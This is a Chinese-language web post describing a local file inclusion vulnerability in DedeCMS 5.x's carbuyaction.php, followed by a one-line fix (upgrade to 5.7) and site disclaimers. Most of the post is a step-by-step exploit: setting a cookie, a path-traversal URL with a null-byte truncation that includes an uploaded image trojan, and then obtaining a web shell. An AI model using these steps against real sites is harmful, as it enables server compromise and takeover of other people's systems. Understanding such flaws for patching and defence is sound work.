使用过DEDECMS的人,可能很多都知道了这个漏洞,在DEDECMS5.X版本中,这个文件漏洞一直存在,文件如下:漏洞文件carbuyaction.php


  1. 首先利用cookie修改工具,加上code=alipay然后访问
  2. http://www.xxx.com/plus/carbuyaction.php?dopost=return&code=../../uploads/userup/xx/myface.gif%00
  3. 直接包含成功
  4. 利用条件为GPCOFF,或者某些环境下的截断。
  5. 可以在会员中心里上传个图片木马进行拿shell。
  6. 还可以包含dede自身文件进行更多利用,这里就不详细了。

现在最新版的DEDECMS5.7已经修复了这个错误,如果是早起的版本DEDECMS请用最新版文件覆盖即可

免责声明:本站所有文章和图片均来自用户分享和网络收集,文章和图片版权归原作者及原出处所有,仅供学习与参考,请勿用于商业用途,如果损害了您的权利,请联系网站客服处理。

声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。